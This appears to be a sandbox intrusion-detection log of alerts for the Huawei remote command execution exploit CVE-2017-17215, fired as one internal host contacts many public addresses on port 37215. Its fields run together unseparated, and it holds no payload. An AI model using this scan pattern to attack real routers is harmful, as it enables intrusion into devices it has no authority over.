                                                    07/10/24-08:26:11.613334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018837215192.168.2.1489.24.181.240
                                                    07/10/24-08:27:10.583365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4462037215192.168.2.14197.127.137.133
                                                    07/10/24-08:26:47.906246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3358837215192.168.2.1441.237.96.174
                                                    07/10/24-08:26:31.084191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5823237215192.168.2.14197.166.51.126
                                                    07/10/24-08:26:11.578459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102837215192.168.2.14197.242.235.173
                                                    07/10/24-08:26:42.376307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349637215192.168.2.14117.225.206.102
                                                    07/10/24-08:26:57.530993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839437215192.168.2.1441.123.90.188
                                                    07/10/24-08:27:30.407360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3301637215192.168.2.14157.116.228.75
                                                    07/10/24-08:27:10.635784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5491637215192.168.2.14197.137.39.0
                                                    07/10/24-08:27:33.769630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4649637215192.168.2.14197.198.28.94
                                                    07/10/24-08:27:22.848965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123637215192.168.2.14157.34.176.36
                                                    07/10/24-08:26:43.809234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157837215192.168.2.1441.154.218.75
                                                    07/10/24-08:26:38.566781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793837215192.168.2.14197.253.98.121
                                                    07/10/24-08:26:57.517659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172637215192.168.2.14157.90.66.161
                                                    07/10/24-08:27:02.686169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4994837215192.168.2.14197.5.129.235
                                                    07/10/24-08:26:59.860909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355837215192.168.2.14198.10.242.162
                                                    07/10/24-08:26:15.799288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476637215192.168.2.1417.100.117.157
                                                    07/10/24-08:26:13.829838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164637215192.168.2.1441.165.144.112
                                                    07/10/24-08:27:13.761969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474837215192.168.2.14157.185.243.255
                                                    07/10/24-08:27:13.896003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295837215192.168.2.14157.60.247.93
                                                    07/10/24-08:27:23.946420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759237215192.168.2.14143.174.134.68
                                                    07/10/24-08:26:15.823696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975837215192.168.2.14197.222.33.32
                                                    07/10/24-08:26:57.669251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309237215192.168.2.1476.205.171.247
                                                    07/10/24-08:26:49.781765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845037215192.168.2.1441.184.230.120
                                                    07/10/24-08:27:23.959753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319837215192.168.2.14157.220.123.164
                                                    07/10/24-08:26:36.355450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069637215192.168.2.1441.50.54.120
                                                    07/10/24-08:26:59.879798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4058037215192.168.2.14206.163.107.13
                                                    07/10/24-08:26:34.234468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362237215192.168.2.1441.182.148.86
                                                    07/10/24-08:26:44.496105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092237215192.168.2.14157.27.180.71
                                                    07/10/24-08:26:41.524750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5540837215192.168.2.14197.250.149.175
                                                    07/10/24-08:26:49.878090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200637215192.168.2.14157.185.96.87
                                                    07/10/24-08:27:22.476492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497437215192.168.2.14199.139.21.250
                                                    07/10/24-08:27:23.948745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803437215192.168.2.14212.23.115.146
                                                    07/10/24-08:26:42.446098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827637215192.168.2.14197.156.33.27
                                                    07/10/24-08:27:05.141493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299837215192.168.2.14188.249.143.47
                                                    07/10/24-08:27:07.290610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5303037215192.168.2.1491.12.74.198
                                                    07/10/24-08:26:49.859593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774437215192.168.2.14157.41.81.10
                                                    07/10/24-08:27:03.011649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148037215192.168.2.14157.21.112.249
                                                    07/10/24-08:26:55.423552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805637215192.168.2.1441.100.25.154
                                                    07/10/24-08:27:13.867298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5293637215192.168.2.1467.0.217.116
                                                    07/10/24-08:26:55.472198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359237215192.168.2.14157.30.1.177
                                                    07/10/24-08:26:57.644791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351637215192.168.2.14196.200.178.240
                                                    07/10/24-08:26:33.171308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988037215192.168.2.14197.159.236.34
                                                    07/10/24-08:26:47.746309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495237215192.168.2.1436.30.238.123
                                                    07/10/24-08:26:57.517659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639037215192.168.2.1441.204.245.164
                                                    07/10/24-08:27:08.373070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4352637215192.168.2.14197.106.50.16
                                                    07/10/24-08:27:17.057474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4122837215192.168.2.14157.245.236.20
                                                    07/10/24-08:26:13.838798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527037215192.168.2.1458.146.172.194
                                                    07/10/24-08:26:57.669115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680437215192.168.2.14197.145.231.60
                                                    07/10/24-08:26:41.391296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575037215192.168.2.14197.32.124.201
                                                    07/10/24-08:27:20.424605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401237215192.168.2.1441.1.106.1
                                                    07/10/24-08:27:07.310052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181437215192.168.2.1441.177.22.63
                                                    07/10/24-08:26:53.117247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843637215192.168.2.14197.12.84.184
                                                    07/10/24-08:27:27.112829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024037215192.168.2.1441.19.170.40
                                                    07/10/24-08:26:52.029785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3547037215192.168.2.14197.60.84.7
                                                    07/10/24-08:26:17.953506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685237215192.168.2.1496.175.67.133
                                                    07/10/24-08:26:55.402218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569237215192.168.2.14157.39.78.25
                                                    07/10/24-08:27:05.183650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517037215192.168.2.14161.158.145.247
                                                    07/10/24-08:26:47.877445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362037215192.168.2.14157.247.220.159
                                                    07/10/24-08:26:15.823629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5340237215192.168.2.1441.65.143.86
                                                    07/10/24-08:26:59.633265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864837215192.168.2.1441.6.15.234
                                                    07/10/24-08:26:59.881889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964837215192.168.2.14197.117.242.178
                                                    07/10/24-08:26:20.098381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564837215192.168.2.14207.151.84.26
                                                    07/10/24-08:26:36.433814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764837215192.168.2.1441.139.23.248
                                                    07/10/24-08:27:10.632991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382637215192.168.2.14197.212.203.192
                                                    07/10/24-08:27:10.699441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469637215192.168.2.14157.159.1.252
                                                    07/10/24-08:27:02.933284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086637215192.168.2.1441.38.39.123
                                                    07/10/24-08:27:23.934350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688237215192.168.2.1441.53.104.113
                                                    07/10/24-08:26:11.485885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4294437215192.168.2.1441.71.63.179
                                                    07/10/24-08:26:53.129379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079437215192.168.2.14197.106.2.208
                                                    07/10/24-08:27:19.265818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568837215192.168.2.14197.253.226.241
                                                    07/10/24-08:26:25.460773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129637215192.168.2.1438.90.153.116
                                                    07/10/24-08:26:29.847000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443837215192.168.2.14104.98.84.254
                                                    07/10/24-08:27:11.555900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412437215192.168.2.1459.114.104.163
                                                    07/10/24-08:27:14.002170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620037215192.168.2.14157.225.139.23
                                                    07/10/24-08:27:08.379030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085837215192.168.2.1441.64.17.14
                                                    07/10/24-08:26:26.535495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051637215192.168.2.14197.70.206.12
                                                    07/10/24-08:27:31.448470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5953037215192.168.2.14157.60.25.245
                                                    07/10/24-08:27:23.786219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732237215192.168.2.1441.122.235.42
                                                    07/10/24-08:26:20.168870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462037215192.168.2.14157.100.113.152
                                                    07/10/24-08:27:33.928939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503037215192.168.2.14197.198.203.35
                                                    07/10/24-08:26:17.947291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313837215192.168.2.14187.19.183.36
                                                    07/10/24-08:27:02.851732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065637215192.168.2.14157.198.24.143
                                                    07/10/24-08:27:14.885642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4907037215192.168.2.14102.40.149.176
                                                    07/10/24-08:26:42.379433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549437215192.168.2.14197.115.139.23
                                                    07/10/24-08:26:20.161677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867037215192.168.2.14197.11.67.81
                                                    07/10/24-08:26:28.868107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690637215192.168.2.14162.6.100.188
                                                    07/10/24-08:26:57.557650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180237215192.168.2.1441.223.222.241
                                                    07/10/24-08:27:24.964611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246237215192.168.2.14157.252.216.206
                                                    07/10/24-08:27:22.839204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653437215192.168.2.14157.211.187.36
                                                    07/10/24-08:26:20.132351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683437215192.168.2.14197.243.177.158
                                                    07/10/24-08:27:02.869680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855637215192.168.2.14197.7.246.1
                                                    07/10/24-08:27:14.859922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4451037215192.168.2.1441.106.18.7
                                                    07/10/24-08:26:26.563036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680437215192.168.2.14157.123.90.255
                                                    07/10/24-08:26:49.854683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608437215192.168.2.14143.64.81.195
                                                    07/10/24-08:26:53.237677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658637215192.168.2.1488.148.42.144
                                                    07/10/24-08:26:43.856706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834037215192.168.2.14197.10.244.203
                                                    07/10/24-08:26:59.844972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487837215192.168.2.1441.24.44.68
                                                    07/10/24-08:26:33.196369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586837215192.168.2.1441.12.53.122
                                                    07/10/24-08:26:52.013363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198237215192.168.2.1441.172.24.93
                                                    07/10/24-08:27:14.858579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659837215192.168.2.1435.38.75.26
                                                    07/10/24-08:27:28.177023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331037215192.168.2.1441.145.240.66
                                                    07/10/24-08:26:11.148084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104237215192.168.2.1441.115.148.8
                                                    07/10/24-08:26:49.761554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515037215192.168.2.14157.148.56.163
                                                    07/10/24-08:27:22.926314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5686437215192.168.2.14157.134.246.248
                                                    07/10/24-08:26:25.505389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720637215192.168.2.14157.10.139.198
                                                    07/10/24-08:27:23.924577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817037215192.168.2.1441.148.80.254
                                                    07/10/24-08:26:15.795103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5448837215192.168.2.14197.206.117.234
                                                    07/10/24-08:26:43.613127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237637215192.168.2.14157.138.229.198
                                                    07/10/24-08:27:08.357813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5750237215192.168.2.14157.104.70.18
                                                    07/10/24-08:26:42.431726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4995237215192.168.2.1441.253.85.190
                                                    07/10/24-08:27:34.131322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614037215192.168.2.1441.40.97.55
                                                    07/10/24-08:27:02.756969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643437215192.168.2.1441.114.237.208
                                                    07/10/24-08:27:13.842727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518437215192.168.2.14157.229.16.160
                                                    07/10/24-08:26:47.994856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3627437215192.168.2.14197.127.74.100
                                                    07/10/24-08:26:17.997634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5813437215192.168.2.14197.64.128.218
                                                    07/10/24-08:26:55.366242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4504437215192.168.2.1441.45.128.105
                                                    07/10/24-08:26:25.494169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795837215192.168.2.14157.25.209.174
                                                    07/10/24-08:27:08.318439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552037215192.168.2.14197.86.103.20
                                                    07/10/24-08:26:41.611140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531437215192.168.2.14157.37.241.96
                                                    07/10/24-08:27:17.011385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5860437215192.168.2.14157.157.179.151
                                                    07/10/24-08:26:49.748241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570237215192.168.2.1441.239.165.163
                                                    07/10/24-08:27:02.845068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768637215192.168.2.14157.56.251.72
                                                    07/10/24-08:27:13.949060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870837215192.168.2.1466.159.41.141
                                                    07/10/24-08:26:43.698481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864637215192.168.2.14197.179.197.149
                                                    07/10/24-08:27:05.207255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914637215192.168.2.14157.143.45.136
                                                    07/10/24-08:26:25.488012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5317037215192.168.2.14157.159.109.75
                                                    07/10/24-08:26:47.996062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278237215192.168.2.14157.35.169.150
                                                    07/10/24-08:27:05.158700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4758037215192.168.2.1441.172.140.224
                                                    07/10/24-08:27:08.415369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660437215192.168.2.1477.19.129.248
                                                    07/10/24-08:27:30.562651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591237215192.168.2.14197.155.163.227
                                                    07/10/24-08:26:38.545437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538037215192.168.2.14159.108.18.241
                                                    07/10/24-08:26:43.623006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440437215192.168.2.1441.116.48.68
                                                    07/10/24-08:27:08.371486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067437215192.168.2.1441.104.152.198
                                                    07/10/24-08:27:10.767328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5830637215192.168.2.14197.44.200.184
                                                    07/10/24-08:26:52.022283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956837215192.168.2.14157.64.182.209
                                                    07/10/24-08:26:29.768210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361237215192.168.2.14197.44.120.208
                                                    07/10/24-08:27:24.969390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472437215192.168.2.1443.117.218.101
                                                    07/10/24-08:26:26.576536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915637215192.168.2.1441.242.212.199
                                                    07/10/24-08:26:38.603168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5610037215192.168.2.14197.133.163.102
                                                    07/10/24-08:26:47.974882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170437215192.168.2.14157.196.167.18
                                                    07/10/24-08:26:52.005706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745637215192.168.2.14157.117.149.175
                                                    07/10/24-08:26:57.515772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738437215192.168.2.14157.137.68.15
                                                    07/10/24-08:26:33.214564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4231837215192.168.2.14197.228.88.7
                                                    07/10/24-08:26:34.223283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285837215192.168.2.14197.192.199.111
                                                    07/10/24-08:27:23.944387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870637215192.168.2.14157.222.96.154
                                                    07/10/24-08:27:17.107652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3387437215192.168.2.1441.128.14.221
                                                    07/10/24-08:26:13.807445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567637215192.168.2.1441.161.207.152
                                                    07/10/24-08:27:33.874672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4795637215192.168.2.14197.158.220.191
                                                    07/10/24-08:26:57.637294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5736237215192.168.2.14197.154.35.176
                                                    07/10/24-08:27:23.888639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5050637215192.168.2.1451.211.147.123
                                                    07/10/24-08:26:14.827128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808837215192.168.2.1441.242.97.143
                                                    07/10/24-08:27:30.417770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877837215192.168.2.1441.226.236.122
                                                    07/10/24-08:26:28.830687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913037215192.168.2.14157.120.123.96
                                                    07/10/24-08:26:42.436747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849837215192.168.2.14197.28.133.178
                                                    07/10/24-08:27:27.153335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170437215192.168.2.14197.84.27.217
                                                    07/10/24-08:26:17.951763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755437215192.168.2.14126.140.143.254
                                                    07/10/24-08:26:38.620224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3903037215192.168.2.1441.96.21.91
                                                    07/10/24-08:26:17.980913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3360237215192.168.2.1441.9.89.204
                                                    07/10/24-08:26:29.811396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812837215192.168.2.14157.125.228.229
                                                    07/10/24-08:26:43.820800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740637215192.168.2.14197.97.219.135
                                                    07/10/24-08:26:13.778157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209037215192.168.2.14157.43.50.8
                                                    07/10/24-08:27:20.412870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550237215192.168.2.14197.9.153.149
                                                    07/10/24-08:26:41.464716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956437215192.168.2.1441.7.160.99
                                                    07/10/24-08:27:22.571797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5919837215192.168.2.14197.57.24.175
                                                    07/10/24-08:26:36.425818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544637215192.168.2.14219.192.81.67
                                                    07/10/24-08:26:43.922168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775237215192.168.2.14197.14.94.82
                                                    07/10/24-08:27:07.349676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642237215192.168.2.14121.6.100.119
                                                    07/10/24-08:26:33.248945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688637215192.168.2.1441.132.238.135
                                                    07/10/24-08:27:17.027342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771237215192.168.2.14197.211.47.72
                                                    07/10/24-08:26:28.930785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965437215192.168.2.1476.144.191.50
                                                    07/10/24-08:26:55.470125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049437215192.168.2.1441.83.200.94
                                                    07/10/24-08:26:13.828285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204037215192.168.2.1441.15.227.169
                                                    07/10/24-08:26:14.781247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674637215192.168.2.1441.95.69.197
                                                    07/10/24-08:26:51.929780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815437215192.168.2.145.134.11.18
                                                    07/10/24-08:27:32.549602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690837215192.168.2.14197.183.77.95
                                                    07/10/24-08:26:29.805912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261037215192.168.2.1441.85.187.44
                                                    07/10/24-08:26:45.652224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838837215192.168.2.14157.41.129.130
                                                    07/10/24-08:26:38.576463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066037215192.168.2.14106.65.56.3
                                                    07/10/24-08:26:47.773656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392837215192.168.2.14197.124.35.187
                                                    07/10/24-08:27:19.307932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789637215192.168.2.1441.24.149.155
                                                    07/10/24-08:27:31.463838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232637215192.168.2.14132.194.68.167
                                                    07/10/24-08:27:32.622177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289837215192.168.2.1441.215.50.123
                                                    07/10/24-08:27:11.476399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331237215192.168.2.1441.86.135.39
                                                    07/10/24-08:27:32.565962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467237215192.168.2.14129.71.218.59
                                                    07/10/24-08:26:34.217432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575837215192.168.2.1441.77.193.131
